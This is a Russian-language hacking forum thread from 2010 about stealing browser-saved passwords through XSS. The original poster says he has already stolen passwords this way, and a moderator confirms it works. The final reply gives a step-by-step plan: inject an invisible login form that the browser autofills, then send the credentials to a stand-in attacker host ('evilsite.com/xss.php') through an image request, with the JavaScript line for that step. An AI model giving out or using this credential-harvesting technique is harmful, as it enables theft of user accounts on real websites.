 |
16.04.2010, 18:26
|
|
Познающий
Регистрация: 13.04.2010
Сообщений: 42
С нами:
8463290
Репутация:
81
|
|
украсть пароль через XSS
Есть возможность внедрить html код на сайт(тем или иным способом).
Браузеры сохранят пароли и подставлют их в формы.
Можно ли внедрить форму с паролем. и джаваскрипт который бы утащил бы его? У меня удавалось так красть пароли уже с готовой формы(браузер: хром).
Последний раз редактировалось life_glider; 16.04.2010 в 19:29..
Причина: Очепятко
|
|
|
16.04.2010, 18:32
|
|
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
С нами:
9083308
Репутация:
719
|
|
Сообщение от life_glider
Есть возможность внедрить html код на сайт(тем или иным способом).
Браузеры сохранят пароли и подставлют их в формы.
Модно ли внедрить форму с паролем. и джаваскрипт который бы утащил бы его? У меня удавалось так красть пароли уже с готовой формы(браузер: хром).
Да, можно.
Можно внедрить форму ввода пароля, и закрыть текущую форму, если она есть. Все зависит от того, какие именно символы внедряются.
|
|
|
|
20.04.2010, 09:10
|
|
Познающий
Регистрация: 18.01.2009
Сообщений: 62
С нами:
9110938
Репутация:
42
|
|
Либо замена самой формы на стороннюю где и будет оседать пароль, либо внедрение в форму посыла на сниффер, но тогда только получишь куки на не пароль.
|
|
|
|
20.04.2010, 21:35
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 54
С нами:
8955001
Репутация:
80
|
|
хм, ребят, что-то вы усложняете. я не в курсе, как работает жезл в Академическом Театре, но в лисе при определенных настройках (включенной "Сохранять пароли для сайтов" и отключенной "Мастер-пароль") браузер очень несекурно запоминает пароли - если пользователь с этим согласился, то, имея активку на сайте, мы ПО ИДЕЕ можем утащить логин и пароль юзера очень просто. План таков - вставляем в страничку js, который добавляет в документ точно такую же форму, как на логинке, но невидимую, у которой в свойстве onsubmit выполнение своей функции. эта функция добавляет в документ невидимый ифрейм, в свойстве src у которого будет наш сайт, вернее скрипт на нем, который принимает логины и пароли; можно также юзать не ифрейм, а картинку. При этом в качестве параметров для скрипта на нашем сайте передаем логин и пароль из формы, которые вытащит та же функция по таймауту, а лучше не по таймауту, а в зависимости от события, когда загрузится вся страница: лиса только тогда вставляет логин и пароль. итак, что имеем:
1. пользователь заходит на страницу с xss
2. грузится наш js, который:
а) добавляет на страницу невидимую форму, идентичную форме логинки, но с onsubmit="our_function(); return false;"
б) our_function() добавляет невидимую картинку с нашего сайта с img.src="http://evilsite.com/xss.php?login=" + document.getElementById("input_login").innerHtml + "&pass=" + document.getElementById("input_pass").innerHtml
в) как только загрузится весь документ + еще пару секунд (на всякий пожарный) js сабмитит добавленную форму
3. ???
4. PROFIT
Естественно, айдишники элементов будут другими, тут они для примера. Еще бы желательно добавить проверку браузера.
Ах да, еще один момент - xss должна быть в том же документе (с тем же URI), что и форма логинки. то есть если юзер логинится на http://site.com/index.html, то бесполезно вставлять xss на http://site.com/index1.html - браузер просто не вставит туда пароль. это, кстати, и избавляет нас от такой фигни, как кража паролей на почтовиках - форма логинки расположена не в том документе, в который взломщик теоретически может проинжектить свой код.
И последнее - все вышеописанное я не проверял, но по логике работать должно. Если проверите и оно не пашет - можно писать в ПМ или лучше сюда, посмотрим, что да как.
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
